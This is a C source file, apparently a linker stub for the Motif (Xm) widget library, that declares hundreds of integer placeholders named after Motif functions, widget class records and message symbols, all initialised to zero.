int _XmDragC_defaultTranslations = 0;
int xmDragContextClass = 0;
int xmDragContextClassRec = 0;
int xmDragIconClassRec = 0;
int _XmDragIconClean = 0;
int _XmDragIconIsDirty = 0;
int xmDragIconObjectClass = 0;
int _XmDragOverChange = 0;
int _XmDragOverFinish = 0;
int _XmDragOverGetActiveCursor = 0;
int _XmDragOverHide = 0;
int _XmDragOverMove = 0;
int _XmDragOverSetInitialPosition = 0;
int xmDragOverShellClassRec = 0;
int xmDragOverShellWidgetClass = 0;
int _XmDragOverShow = 0;
int XmDragStart = 0;
int _XmDragUnderAnimation = 0;
int _XmDrawArrow = 0;
int XmDrawBevel = 0;
int _XmDrawBorder = 0;
int _XmDrawDiamond = 0;
int _XmDrawDiamondButton = 0;
int _XmDrawHighlight = 0;
int _XmDrawingA_defaultTranslations = 0;
int xmDrawingAreaClassRec = 0;
int _XmDrawingAreaInput = 0;
int xmDrawingAreaWidgetClass = 0;
int _XmDrawingA_traversalTranslations = 0;
int _XmDrawnB_defaultTranslations = 0;
int _XmDrawnB_menuTranslations = 0;
int _XmDrawnBPrimClassExtRec = 0;
int xmDrawnButtonClassRec = 0;
int xmDrawnButtonWidgetClass = 0;
int _XmDrawSeparator = 0;
int _XmDrawShadow = 0;
int _XmDrawShadows = 0;
int _XmDrawShadowType = 0;
int _XmDrawSimpleHighlight = 0;
int _XmDrawSquareButton = 0;
int xmDropDownClassRec = 0;
int XmDropDownGetArrow = 0;
int XmDropDownGetChild = 0;
int XmDropDownGetLabel = 0;
int XmDropDownGetList = 0;
int XmDropDownGetText = 0;
int XmDropDownGetValue = 0;
int xmDropDownWidgetClass = 0;
int XmDropSiteConfigureStackingOrder = 0;
int XmDropSiteEndUpdate = 0;
int XmDropSiteGetActiveVisuals = 0;
int xmDropSiteManagerClassRec = 0;
int xmDropSiteManagerObjectClass = 0;
int XmDropSiteQueryStackingOrder = 0;
int XmDropSiteRegister = 0;
int XmDropSiteRegistered = 0;
int XmDropSiteRetrieve = 0;
int _XmDropSiteShell = 0;
int XmDropSiteStartUpdate = 0;
int XmDropSiteUnregister = 0;
int XmDropSiteUpdate = 0;
int _XmDropSiteWrapperCandidate = 0;
int XmDropTransferAdd = 0;
int xmDropTransferClassRec = 0;
int xmDropTransferObjectClass = 0;
int XmDropTransferStart = 0;
int _XmDSIAddChild = 0;
int _XmDSIDestroy = 0;
int _XmDSIGetBorderWidth = 0;
int _XmDSIGetChildPosition = 0;
int _XmDSIRemoveChild = 0;
int _XmDSIReplaceChild = 0;
int _XmDSISwapChildren = 0;
int _XmDSMGetTreeFromDSM = 0;
int _XmDSMUpdate = 0;
int _XmDSResources = 0;
int XmeAddFocusChangeCallback = 0;
int XmeClearBorder = 0;
int XmeClipboardSink = 0;
int XmeClipboardSource = 0;
int XmeConfigureObject = 0;
int XmeConvertMerge = 0;
int XmeCountVaListSimple = 0;
int XmeCreateClassDialog = 0;
int _XmEditResCheckMessages = 0;
int XmeDragSource = 0;
int XmeDrawArrow = 0;
int XmeDrawCircle = 0;
int XmeDrawDiamond = 0;
int XmeDrawHighlight = 0;
int XmeDrawIndicator = 0;
int XmeDrawPolygonShadow = 0;
int XmeDrawSeparator = 0;
int XmeDrawShadows = 0;
int XmeDropSink = 0;
int XmeFlushIconFileCache = 0;
int XmeFocusIsInShell = 0;
int XmeFromHorizontalPixels = 0;
int XmeFromVerticalPixels = 0;
int XmeGetColorObjData = 0;
int XmeGetDefaultPixel = 0;
int XmeGetDefaultRenderTable = 0;
int XmeGetDesktopColorCells = 0;
int XmeGetDirection = 0;
int XmeGetEncodingAtom = 0;
int XmeGetHomeDirName = 0;
int XmeGetIconControlInfo = 0;
int XmeGetLocalizedString = 0;
int XmeGetMask = 0;
int XmeGetNextCharacter = 0;
int XmeGetNullCursor = 0;
int XmeGetPixelData = 0;
int XmeGetPixmapData = 0;
int XmeGetTextualDragIcon = 0;
int XmeMicroSleep = 0;
int _XmEmptyRect = 0;
int XmeNamedSink = 0;
int XmeNamedSource = 0;
int XmeNamesAreEqual = 0;
int XmeNavigChangeManaged = 0;
int _XmEnterGadget = 0;
int _XmEnterRowColumn = 0;
int _XmEntryByteCountGet = 0;
int _XmEntryCacheGet = 0;
int _XmEntryCharCountGet = 0;
int _XmEntryDirectionGet = 0;
int _XmEntryDirectionSet = 0;
int _XmEntryPopGet = 0;
int _XmEntryPushGet = 0;
int _XmEntryRendBeginCountGet = 0;
int _XmEntryRendBeginGet = 0;
int _XmEntryRendBeginSet = 0;
int _XmEntryRendEndCountGet = 0;
int _XmEntryRendEndGet = 0;
int _XmEntryRendEndSet = 0;
int _XmEntryTabsGet = 0;
int _XmEntryTag = 0;
int _XmEntryTagSet = 0;
int _XmEntryTextGet = 0;
int _XmEntryTextSet = 0;
int _XmEntryTextTypeGet = 0;
int XmeParseUnits = 0;
int XmePrimarySink = 0;
int XmePrimarySource = 0;
int XmeQueryBestCursorSize = 0;
int _XmEraseShadow = 0;
int XmeRedisplayGadgets = 0;
int XmeRemoveFocusChangeCallback = 0;
int XmeRenderTableGetDefaultFont = 0;
int XmeReplyToQueryGeometry = 0;
int XmeResolvePartOffsets = 0;
int XmeSecondarySink = 0;
int XmeSecondarySource = 0;
int XmeSecondaryTransfer = 0;
int XmeSetWMShellTitle = 0;
int XmeStandardConvert = 0;
int XmeStandardTargets = 0;
int XmeStringGetComponent = 0;
int XmeStringIsValid = 0;
int XmeToHorizontalPixels = 0;
int XmeToVerticalPixels = 0;
int XmeTraitGet = 0;
int XmeTraitSet = 0;
int XmeTransferAddDoneProc = 0;
int XmeUseColorObj = 0;
int XmeVirtualToActualKeysyms = 0;
int XmeVLCreateWidget = 0;
int XmeWarning = 0;
int XME_WARNING = 0;
int XmeXpmAttributesSize = 0;
int XmeXpmCreateBufferFromImage = 0;
int XmeXpmCreateBufferFromPixmap = 0;
int XmeXpmCreateBufferFromXpmImage = 0;
int XmeXpmCreateDataFromImage = 0;
int XmeXpmCreateDataFromPixmap = 0;
int XmeXpmCreateDataFromXpmImage = 0;
int XmeXpmCreateImageFromBuffer = 0;
int XmeXpmCreateImageFromData = 0;
int XmeXpmCreateImageFromXpmImage = 0;
int XmeXpmCreatePixmapFromBuffer = 0;
int XmeXpmCreatePixmapFromData = 0;
int XmeXpmCreatePixmapFromXpmImage = 0;
int XmeXpmCreateXpmImageFromBuffer = 0;
int XmeXpmCreateXpmImageFromData = 0;
int XmeXpmCreateXpmImageFromImage = 0;
int XmeXpmCreateXpmImageFromPixmap = 0;
int XmeXpmFree = 0;
int XmeXpmFreeAttributes = 0;
int XmeXpmFreeExtensions = 0;
int XmeXpmFreeXpmImage = 0;
int XmeXpmFreeXpmInfo = 0;
int XmeXpmGetErrorString = 0;
int XmeXpmLibraryVersion = 0;
int XmeXpmReadFileToBuffer = 0;
int XmeXpmReadFileToData = 0;
int XmeXpmReadFileToImage = 0;
int XmeXpmReadFileToPixmap = 0;
int XmeXpmReadFileToXpmImage = 0;
int XmeXpmWriteFileFromBuffer = 0;
int XmeXpmWriteFileFromData = 0;
int XmeXpmWriteFileFromImage = 0;
int XmeXpmWriteFileFromPixmap = 0;
int XmeXpmWriteFileFromXpmImage = 0;
int xmExt18ListClassRec = 0;
int XmExt18ListDeselectItems = 0;
int XmExt18ListDeselectRow = 0;
int XmExt18ListGetSelectedRowArray = 0;
int XmExt18ListGetSelectedRows = 0;
int XmExt18ListMakeRowVisible = 0;
int XmExt18ListSelectAllItems = 0;
int XmExt18ListSelectItems = 0;
int XmExt18ListSelectRow = 0;
int XmExt18ListToggleRow = 0;
int XmExt18ListUnselectAllItems = 0;
int XmExt18ListUnselectItem = 0;
int xmExt18ListWidgetClass = 0;
int xmExtClassRec = 0;
int _XmExtGetValuesHook = 0;
int _XmExtHighlightBorder = 0;
int _XmExtImportArgs = 0;
int _XmExtObjAlloc = 0;
int xmExtObjectClass = 0;
int _XmExtObjFree = 0;
int _XmExtUnhighlightBorder = 0;
int _Xm_fastPtr = 0;
int _XmFastSubclassInit = 0;
int _XmFileSBGeoMatrixCreate = 0;
int xmFileSelectionBoxClassRec = 0;
int _XmFileSelectionBoxCreateDirList = 0;
int _XmFileSelectionBoxCreateDirListLabel = 0;
int _XmFileSelectionBoxCreateFilterLabel = 0;
int _XmFileSelectionBoxCreateFilterText = 0;
int _XmFileSelectionBoxFocusMoved = 0;
int XmFileSelectionBoxGetChild = 0;
int _XmFileSelectionBoxGetDirectory = 0;
int _XmFileSelectionBoxGetDirListItemCount = 0;
int _XmFileSelectionBoxGetDirListItems = 0;
int _XmFileSelectionBoxGetDirListLabelString = 0;
int _XmFileSelectionBoxGetDirMask = 0;
int _XmFileSelectionBoxGetFilterLabelString = 0;
int _XmFileSelectionBoxGetListItemCount = 0;
int _XmFileSelectionBoxGetListItems = 0;
int _XmFileSelectionBoxGetNoMatchString = 0;
int _XmFileSelectionBoxGetPattern = 0;
int _XmFileSelectionBoxNoGeoRequest = 0;
int _XmFileSelectionBoxRestore = 0;
int _XmFileSelectionBoxUpOrDown = 0;
int xmFileSelectionBoxWidgetClass = 0;
int XmFileSelectionDoSearch = 0;
int _XmFilterArgs = 0;
int _XmFilterResources = 0;
int _XmFindNextTabGroup = 0;
int _XmFindPrevTabGroup = 0;
int _XmFindTabGroup = 0;
int _XmFindTopMostShell = 0;
int _XmFindTraversablePrim = 0;
int _XmFocusInGadget = 0;
int _XmFocusIsHere = 0;
int _XmFocusIsInShell = 0;
int _XmFocusModelChanged = 0;
int _XmFocusOutGadget = 0;
int XmFontListAdd = 0;
int XmFontListAppendEntry = 0;
int XmFontListCopy = 0;
int XmFontListCreate = 0;
int XmFontListCreate_r = 0;
int XmFontListEntryCreate = 0;
int XmFontListEntryCreate_r = 0;
int XmFontListEntryFree = 0;
int XmFontListEntryGetFont = 0;
int XmFontListEntryGetTag = 0;
int XmFontListEntryLoad = 0;
int XmFontListFree = 0;
int XmFontListFreeFontContext = 0;
int _XmFontListGetDefaultFont = 0;
int XmFontListGetNextFont = 0;
int XmFontListInitFontContext = 0;
int XmFontListNextEntry = 0;
int XmFontListRemoveEntry = 0;
int _XmFontListSearch = 0;
int xmFontSelectorClassRec = 0;
int xmFontSelectorWidgetClass = 0;
int _XmForegroundColorDefault = 0;
int xmFormClassRec = 0;
int xmFormWidgetClass = 0;
int xmFrameClassRec = 0;
int _XmFrame_defaultTranslations = 0;
int xmFrameWidgetClass = 0;
int _XmFreeDragReceiverInfo = 0;
int _XmFreeHashTable = 0;
int _XmFreeMotifAtom = 0;
int _XmFreeScratchPixmap = 0;
int _XmFreeTravGraph = 0;
int _XmFreeWidgetExtData = 0;
int _XmFromHorizontalPixels = 0;
int _XmFromLayoutDirection = 0;
int _XmFromPanedPixels = 0;
int _XmFromVerticalPixels = 0;
int _XmGadClassExtRec = 0;
int _XmGadgetActivate = 0;
int _XmGadgetArm = 0;
int _XmGadgetButtonMotion = 0;
int xmGadgetClass = 0;
int xmGadgetClassRec = 0;
int _XmGadgetDrag = 0;
int _XmGadgetGetValuesHook = 0;
int _XmGadgetImportArgs = 0;
int _XmGadgetImportSecondaryArgs = 0;
int _XmGadgetKeyInput = 0;
int _XmGadgetMultiActivate = 0;
int _XmGadgetMultiArm = 0;
int _XmGadgetSelect = 0;
int _XmGadgetTraverseCurrent = 0;
int _XmGadgetTraverseDown = 0;
int _XmGadgetTraverseHome = 0;
int _XmGadgetTraverseLeft = 0;
int _XmGadgetTraverseNext = 0;
int _XmGadgetTraverseNextTabGroup = 0;
int _XmGadgetTraversePrev = 0;
int _XmGadgetTraversePrevTabGroup = 0;
int _XmGadgetTraverseRight = 0;
int _XmGadgetTraverseUp = 0;
int _XmGadgetWarning = 0;
int _XmGeoAdjustBoxes = 0;
int _XmGeoArrangeBoxes = 0;
int _XmGeoBoxesSameHeight = 0;
int _XmGeoBoxesSameWidth = 0;
int _XmGeoClearRectObjAreas = 0;
int _XmGeoCount_kids = 0;
int _XmGeoGetDimensions = 0;
int _XmGeoLoadValues = 0;
int _XmGeoMatrixAlloc = 0;
int _XmGeoMatrixFree = 0;
int _XmGeoMatrixGet = 0;
int _XmGeoMatrixSet = 0;
int _XmGeometryEqual = 0;
int _XmGeoReplyYes = 0;
int _XmGeoSetupKid = 0;
int _XmGetActiveDropSite = 0;
int _XmGetActiveItem = 0;
int _XmGetActiveProtocolStyle = 0;
int _XmGetActiveTabGroup = 0;
int _XmGetActiveTopLevelMenu = 0;
int _XmGetActualClass = 0;
int _XmGetArrowDrawRects = 0;
int XmGetAtomName = 0;
int _XmGetAudibleWarning = 0;
int _XmGetBGPixmapName = 0;
int _XmGetBitmapConversionModel = 0;
int _XmGetBottomShadowColor = 0;
int _XmGetClassExtensionPtr = 0;
int _XmGetColorAllocationProc = 0;
int XmGetColorCalculation = 0;
int _XmGetColorCalculationProc = 0;
int _XmGetColoredPixmap = 0;
int _XmGetColors = 0;
int XmGetColors = 0;
int _XmGetDefaultBackgroundColorSpec = 0;
int _XmGetDefaultColors = 0;
int _XmGetDefaultDisplay = 0;
int _XmGetDefaultFontList = 0;
int _XmGetDefaultThresholdsForScreen = 0;
int _XmGetDefaultTime = 0;
int XmGetDestination = 0;
int _XmGetDisplayObject = 0;
int XmGetDragContext = 0;
int _XmGetDragContextFromHandle = 0;
int _XmGetDragCursorCachePtr = 0;
int _XmGetDragProtocolStyle = 0;
int _XmGetDragProxyWindow = 0;
int _XmGetDragReceiverInfo = 0;
int _XmGetDropSiteManagerObject = 0;
int _XmGetEffectiveView = 0;
int _XmGetEncodingRegistryTarget = 0;
int _XmGetFirstFocus = 0;
int _XmGetFirstFont = 0;
int _XmGetFocus = 0;
int _XmGetFocusData = 0;
int _XmGetFocusFlag = 0;
int _XmGetFocusPolicy = 0;
int _XmGetFocusResetFlag = 0;
int XmGetFocusWidget = 0;
int _XmGetFontUnit = 0;
int _XmGetHashEntryIterate = 0;
int _XmGetHighlightColor = 0;
int _XmGetIconControlInfo = 0;
int XmGetIconFileName = 0;
int _XmGetIconPixmapName = 0;
int _XmGetImage = 0;
int _XmGetImageAndHotSpotFromFile = 0;
int _XmGetImageFromFile = 0;
int _XmGetInDragMode = 0;
int _XmGetInsensitiveStippleBitmap = 0;
int _XmGetKidGeo = 0;
int _XmGetLayoutDirection = 0;
int _XmGetManagedInfo = 0;
int _XmGetMaxCursorSize = 0;
int _XmGetMBStringFromXmString = 0;
int XmGetMenuCursor = 0;
int _XmGetMenuCursorByScreen = 0;
int _XmGetMenuProcContext = 0;
int _XmGetMenuState = 0;
int _XmGetMotifAtom = 0;
int _XmGetMoveOpaqueByScreen = 0;
int _XmGetNavigability = 0;
int _XmGetNavigationType = 0;
int _Xm_GetNewElement = 0;
int XmGetNewPictureState = 0;
int _XmGetNullCursor = 0;
int _XmGetPixelData = 0;
int _XmGetPixmap = 0;
int XmGetPixmap = 0;
int _XmGetPixmapBasedGC = 0;
int XmGetPixmapByDepth = 0;
int _XmGetPixmapData = 0;
int _XmGetPointVisibility = 0;
int _XmGetPopupMenuClick = 0;
int XmGetPostedFromWidget = 0;
int _XmGetRC_PopupPosted = 0;
int _XmGetRealXlations = 0;
int _XmGetScaledPixmap = 0;
int XmGetScaledPixmap = 0;
int _XmGetScreenObject = 0;
int XmGetSecondaryResourceData = 0;
int _XmGetTabGroup = 0;
int XmGetTabGroup = 0;
int XmGetTearOffControl = 0;
int _XmGetTextualDragIcon = 0;
int XmGetToolTipString = 0;
int _XmGetTopShadowColor = 0;
int _XmGetTransientFlag = 0;
int _XmGetUnitType = 0;
int _XmGetUnpostBehavior = 0;
int XmGetVisibility = 0;
int _XmGetWidgetExtData = 0;
int _XmGetWidgetNavigPtrs = 0;
int _XmGetWorldObject = 0;
int _XmGetWrapperData = 0;
int XmGetXmDisplay = 0;
int _XmGetXmDisplayClass = 0;
int XmGetXmScreen = 0;
int _XmGMCalcSize = 0;
int _XmGMDoLayout = 0;
int _XmGMEnforceMargin = 0;
int _XmGMHandleGeometryManager = 0;
int _XmGMHandleQueryGeometry = 0;
int _XmGMOverlap = 0;
int _XmGMReplyToQueryGeometry = 0;
int _XmGrabKeyboard = 0;
int _XmGrabPointer = 0;
int xmGrabShellClassRec = 0;
int _XmGrabShell_translations = 0;
int xmGrabShellWidgetClass = 0;
int _XmGrabTheFocus = 0;
int _XmHandleGeometryManager = 0;
int _XmHandleMenuButtonPress = 0;
int _XmHandleQueryGeometry = 0;
int _XmHandleSizeUpdate = 0;
int _XmHashTableCount = 0;
int _XmHashTableSize = 0;
int _XmHeapAlloc = 0;
int _XmHeapCreate = 0;
int _XmHeapFree = 0;
int xmHierarchyClassRec = 0;
int XmHierarchyGetChildNodes = 0;
int XmHierarchyOpenAllAncestors = 0;
int xmHierarchyWidgetClass = 0;
int _XmHighlightBorder = 0;
int _XmHighlightColorDefault = 0;
int _XmHighlightPixmapDefault = 0;
int _XmHWQuery = 0;
int xmI18ListClassRec = 0;
int XmI18ListDeselectItems = 0;
int XmI18ListDeselectRow = 0;
int XmI18ListDoSearch = 0;
int XmI18ListFindRow = 0;
int XmI18ListGetSelectedRowArray = 0;
int XmI18ListGetSelectedRows = 0;
int XmI18ListMakeRowVisible = 0;
int XmI18ListSelectAllItems = 0;
int XmI18ListSelectItems = 0;
int XmI18ListSelectRow = 0;
int XmI18ListToggleRow = 0;
int xmI18ListWidgetClass = 0;
int _XmICCCallbackToICCEvent = 0;
int _XmICCEventToICCCallback = 0;
int xmIconBoxClassRec = 0;
int XmIconBoxIsCellEmpty = 0;
int xmIconBoxWidgetClass = 0;
int xmIconButtonClassRec = 0;
int xmIconButtonWidgetClass = 0;
int xmIconGadgetClass = 0;
int xmIconGadgetClassRec = 0;
int _XmIconGadgetIconPos = 0;
int xmIconGCacheObjClassRec = 0;
int xmIconHeaderClass = 0;
int xmIconHeaderClassRec = 0;
int _XmIEndUpdate = 0;
int _XmImChangeManaged = 0;
int XmImCloseXIM = 0;
int _XmImFreeShellData = 0;
int XmImFreeXIC = 0;
int XmImGetXIC = 0;
int XmImGetXICResetState = 0;
int XmImGetXIM = 0;
int XmImMbLookupString = 0;
int XmImMbResetIC = 0;
int _XmImRealize = 0;
int _XmImRedisplay = 0;
int XmImRegister = 0;
int _XmImResize = 0;
int XmImSetFocusValues = 0;
int XmImSetValues = 0;
int XmImSetXIC = 0;
int XmImUnregister = 0;
int XmImUnsetFocus = 0;
int XmImVaSetFocusValues = 0;
int XmImVaSetValues = 0;
int _XmIndexToTargets = 0;
int _XmInheritClass = 0;
int _XmInImageCache = 0;
int _XmInitByteOrderChar = 0;
int _XmInitializeExtensions = 0;
int _XmInitializeMenuCursor = 0;
int _XmInitializeScrollBars = 0;
int _XmInitializeSyntheticResources = 0;
int _XmInitializeTraits = 0;
int _XmInitModifiers = 0;
int _XmInitTargetsTable = 0;
int _XmInputForGadget = 0;
int _XmInputInGadget = 0;
int _XmInstallImage = 0;
int XmInstallImage = 0;
int _XmInstallPixmap = 0;
int _XmInstallProtocols = 0;
int XmInternAtom = 0;
int _XmIntersectionOf = 0;
int _XmIntersectRect = 0;
int _XmInvalidCursorIconQuark = 0;
int _XmIsActiveTearOff = 0;
int _XmIsEventUnique = 0;
int _XmIsFastSubclass = 0;
int _XmIsISO10646 = 0;
int XmIsMotifWMRunning = 0;
int _XmIsNavigable = 0;
int _XmIsScrollableClipWidget = 0;
int _XmIsSlowSubclass = 0;
int _XmIsStandardMotifWidgetClass = 0;
int _XmIsSubclassOf = 0;
int _XmIsTearOffShellDescendant = 0;
int XmIsTraversable = 0;
int _XmIsViewable = 0;
int _XmJpegErrorExit = 0;
int _XmJpegGetImage = 0;
int _XmLabel_AccessTextualRecord = 0;
int _XmLabelCacheCompare = 0;
int _XmLabelCalcTextRect = 0;
int xmLabelClassRec = 0;
int _XmLabelCloneMenuSavvy = 0;
int _XmLabelConvert = 0;
int _XmLabel_defaultTranslations = 0;
int _XmLabelGadClassExtRec = 0;
int xmLabelGadgetClass = 0;
int xmLabelGadgetClassRec = 0;
int xmLabelGCacheObjClassRec = 0;
int _XmLabelGCalcTextRect = 0;
int _XmLabelGCloneMenuSavvy = 0;
int _XmLabelGCVTRedraw = 0;
int _XmLabel_menuTranslations = 0;
int _XmLabel_menu_traversal_events = 0;
int _XmLabelPrimClassExtRec = 0;
int _XmLabelSetBackgroundGC = 0;
int xmLabelWidgetClass = 0;
int _XmLeafPaneFocusOut = 0;
int _XmLeaveGadget = 0;
int _XmLinkCursorIconQuark = 0;
int _XmListAddAfter = 0;
int _XmListAddBefore = 0;
int XmListAddItem = 0;
int XmListAddItems = 0;
int XmListAddItemsUnselected = 0;
int XmListAddItemUnselected = 0;
int xmListClassRec = 0;
int _XmListCount = 0;
int XmListDeleteAllItems = 0;
int XmListDeleteItem = 0;
int XmListDeleteItems = 0;
int XmListDeleteItemsPos = 0;
int XmListDeletePos = 0;
int XmListDeletePositions = 0;
int XmListDeselectAllItems = 0;
int XmListDeselectItem = 0;
int XmListDeselectPos = 0;
int _XmListExec = 0;
int _XmListFree = 0;
int XmListGetKbdItemPos = 0;
int XmListGetMatchPos = 0;
int XmListGetSelectedPos = 0;
int _XmListInit = 0;
int XmListItemExists = 0;
int XmListItemPos = 0;
int _XmList_ListXlations1 = 0;
int _XmList_ListXlations2 = 0;
int XmListPosSelected = 0;
int XmListPosToBounds = 0;
int _XmListRemove = 0;
int XmListReplaceItems = 0;
int XmListReplaceItemsPos = 0;
int XmListReplaceItemsPosUnselected = 0;
int XmListReplaceItemsUnselected = 0;
int XmListReplacePositions = 0;
int XmListSelectItem = 0;
int XmListSelectPos = 0;
int XmListSetAddMode = 0;
int XmListSetBottomItem = 0;
int XmListSetBottomPos = 0;
int XmListSetHorizPos = 0;
int XmListSetItem = 0;
int XmListSetKbdItemPos = 0;
int XmListSetPos = 0;
int XmListUpdateSelectedList = 0;
int xmListWidgetClass = 0;
int XmListYToPos = 0;
int _XmLowerCase = 0;
int _XmLowerTearOffObscuringPoppingDownPanes = 0;
int xmMainWindowClassRec = 0;
int XmMainWindowSep1 = 0;
int XmMainWindowSep2 = 0;
int XmMainWindowSep3 = 0;
int XmMainWindowSetAreas = 0;
int xmMainWindowWidgetClass = 0;
int _XmMakeGeometryRequest = 0;
int xmManagerClassRec = 0;
int _XmManager_defaultTranslations = 0;
int _XmManagerEnter = 0;
int _XmManagerFocusIn = 0;
int _XmManagerFocusInInternal = 0;
int _XmManagerFocusOut = 0;
int _XmManagerGetValuesHook = 0;
int _XmManagerHelp = 0;
int _XmManagerHighlightPixmapDefault = 0;
int _XmManagerImportArgs = 0;
int _XmManagerLeave = 0;
int _XmManager_managerTraversalTranslations = 0;
int _XmManagerParentActivate = 0;
int _XmManagerParentCancel = 0;
int _XmManagerTopShadowPixmapDefault = 0;
int _XmManagerUnmap = 0;
int xmManagerWidgetClass = 0;
int _XmMapBtnEvent = 0;
int _XmMapHashTable = 0;
int _XmMapKeyEvent = 0;
int _XmMapKeyEvents = 0;
int XmMapSegmentEncoding = 0;
int _XmMatchBDragEvent = 0;
int _XmMatchBSelectEvent = 0;
int _XmMatchBtnEvent = 0;
int _XmMatchKeyEvent = 0;
int _XmMenuBarFix = 0;
int _XmMenuBarGadgetSelect = 0;
int _XmMenuBtnDown = 0;
int _XmMenuBtnUp = 0;
int _XmMenuButtonTakeFocus = 0;
int _XmMenuButtonTakeFocusUp = 0;
int _XmMenuCursorContext = 0;
int _XmMenuEscape = 0;
int _XmMenuFocus = 0;
int _XmMenuFocusIn = 0;
int _XmMenuFocusOut = 0;
int _XmMenuGadgetDrag = 0;
int _XmMenuGadgetTraverseCurrent = 0;
int _XmMenuGadgetTraverseCurrentUp = 0;
int _XmMenuGrabKeyboardAndPointer = 0;
int _XmMenuHelp = 0;
int _XmMenuPopDown = 0;
int XmMenuPosition = 0;
int _XmMenuSetInPMMode = 0;
int xmMenuShellClassRec = 0;
int _XmMenuShell_translations = 0;
int xmMenuShellWidgetClass = 0;
int _XmMenuTraversalHandler = 0;
int _XmMenuTraverseDown = 0;
int _XmMenuTraverseLeft = 0;
int _XmMenuTraverseRight = 0;
int _XmMenuTraverseUp = 0;
int _XmMenuUnmap = 0;
int xmMessageBoxClassRec = 0;
int _XmMessageBoxGeoMatrixCreate = 0;
int XmMessageBoxGetChild = 0;
int _XmMessageBoxNoGeoRequest = 0;
int xmMessageBoxWidgetClass = 0;
int _XmMessageTypeToReason = 0;
int _XmMgrTraversal = 0;
int _XmMicroSleep = 0;
int _Xm_MOTIF_DRAG_AND_DROP_MESSAGE = 0;
int _XmMoveCursorIconQuark = 0;
int _XmMoveObject = 0;
int _XmMoveWidget = 0;
int _XmMsgBaseClass_0000 = 0;
int _XmMsgBaseClass_0001 = 0;
int _XmMsgBulletinB_0001 = 0;
int _XmMsgCascadeB_0000 = 0;
int _XmMsgCascadeB_0001 = 0;
int _XmMsgCascadeB_0002 = 0;
int _XmMsgCascadeB_0003 = 0;
int _XmMsgColObj_0001 = 0;
int _XmMsgColObj_0002 = 0;
int _XmMsgComboBox_0000 = 0;
int _XmMsgComboBox_0001 = 0;
int _XmMsgComboBox_0004 = 0;
int _XmMsgComboBox_0005 = 0;
int _XmMsgComboBox_0006 = 0;
int _XmMsgComboBox_0007 = 0;
int _XmMsgComboBox_0008 = 0;
int _XmMsgComboBox_0009 = 0;
int _XmMsgComboBox_0010 = 0;
int _XmMsgComboBox_0011 = 0;
int _XmMsgComboBox_0012 = 0;
int _XmMsgComboBox_0013 = 0;
int _XmMsgComboBox_0014 = 0;
int _XmMsgCommand_0000 = 0;
int _XmMsgCommand_0001 = 0;
int _XmMsgCommand_0002 = 0;
int _XmMsgCommand_0003 = 0;
int _XmMsgCommand_0004 = 0;
int _XmMsgCommand_0005 = 0;
int _XmMsgContainer_0000 = 0;
int _XmMsgContainer_0001 = 0;
int _XmMsgCutPaste_0000 = 0;
int _XmMsgCutPaste_0001 = 0;
int _XmMsgCutPaste_0002 = 0;
int _XmMsgCutPaste_0003 = 0;
int _XmMsgCutPaste_0004 = 0;
int _XmMsgCutPaste_0005 = 0;
int _XmMsgCutPaste_0006 = 0;
int _XmMsgCutPaste_0007 = 0;
int _XmMsgCutPaste_0008 = 0;
int _XmMsgCutPaste_0009 = 0;
int _XmMsgDataF_0000 = 0;
int _XmMsgDataF_0001 = 0;
int _XmMsgDataF_0002 = 0;
int _XmMsgDataF_0003 = 0;
int _XmMsgDataF_0004 = 0;
int _XmMsgDataF_0005 = 0;
int _XmMsgDataF_0006 = 0;
int _XmMsgDataFWcs_0000 = 0;
int _XmMsgDataFWcs_0001 = 0;
int _XmMsgDialogS_0000 = 0;
int _XmMsgDisplay_0001 = 0;
int _XmMsgDisplay_0002 = 0;
int _XmMsgDisplay_0003 = 0;
int _XmMsgDragBS_0000 = 0;
int _XmMsgDragBS_0001 = 0;
int _XmMsgDragBS_0002 = 0;
int _XmMsgDragBS_0003 = 0;
int _XmMsgDragBS_0004 = 0;
int _XmMsgDragBS_0005 = 0;
int _XmMsgDragBS_0006 = 0;
int _XmMsgDragC_0001 = 0;
int _XmMsgDragC_0002 = 0;
int _XmMsgDragC_0003 = 0;
int _XmMsgDragC_0004 = 0;
int _XmMsgDragC_0005 = 0;
int _XmMsgDragC_0006 = 0;
int _XmMsgDragICC_0000 = 0;
int _XmMsgDragICC_0001 = 0;
int _XmMsgDragIcon_0000 = 0;
int _XmMsgDragIcon_0001 = 0;
int _XmMsgDragOverS_0000 = 0;
int _XmMsgDragOverS_0001 = 0;
int _XmMsgDragOverS_0002 = 0;
int _XmMsgDragOverS_0003 = 0;
int _XmMsgDragUnder_0000 = 0;
int _XmMsgDragUnder_0001 = 0;
int _XmMsgDropSMgr_0001 = 0;
int _XmMsgDropSMgr_0002 = 0;
int _XmMsgDropSMgr_0003 = 0;
int _XmMsgDropSMgr_0004 = 0;
int _XmMsgDropSMgr_0005 = 0;
int _XmMsgDropSMgr_0006 = 0;
int _XmMsgDropSMgr_0007 = 0;
int _XmMsgDropSMgr_0008 = 0;
int _XmMsgDropSMgr_0009 = 0;
int _XmMsgDropSMgr_0010 = 0;
int _XmMsgDropSMgrI_0001 = 0;
int _XmMsgDropSMgrI_0002 = 0;
int _XmMsgDropSMgrI_0003 = 0;
int _XmMsgForm_0000 = 0;
int _XmMsgForm_0002 = 0;
int _XmMsgForm_0003 = 0;
int _XmMsgGadget_0000 = 0;
int _XmMsgLabel_0003 = 0;
int _XmMsgLabel_0004 = 0;
int _XmMsgList_0000 = 0;
int _XmMsgList_0005 = 0;
int _XmMsgList_0006 = 0;
int _XmMsgList_0007 = 0;
int _XmMsgList_0008 = 0;
int _XmMsgList_0009 = 0;
int _XmMsgList_0010 = 0;
int _XmMsgList_0011 = 0;
int _XmMsgList_0012 = 0;
int _XmMsgList_0013 = 0;
int _XmMsgList_0014 = 0;
int _XmMsgList_0015 = 0;
int _XmMsgMainW_0000 = 0;
int _XmMsgMainW_0001 = 0;
int _XmMsgManager_0000 = 0;
int _XmMsgManager_0001 = 0;
int _XmMsgMenuShell_0000 = 0;
int _XmMsgMenuShell_0001 = 0;
int _XmMsgMenuShell_0002 = 0;
int _XmMsgMenuShell_0003 = 0;
int _XmMsgMenuShell_0004 = 0;
int _XmMsgMenuShell_0005 = 0;
int _XmMsgMenuShell_0006 = 0;
int _XmMsgMenuShell_0007 = 0;
int _XmMsgMenuShell_0008 = 0;
int _XmMsgMenuShell_0009 = 0;
int _XmMsgMessageB_0003 = 0;
int _XmMsgMessageB_0004 = 0;
int _XmMsgMotif_0000 = 0;
int _XmMsgMotif_0001 = 0;
int _XmMsgNotebook_0000 = 0;
int _XmMsgPanedW_0000 = 0;
int _XmMsgPanedW_0001 = 0;
int _XmMsgPanedW_0002 = 0;
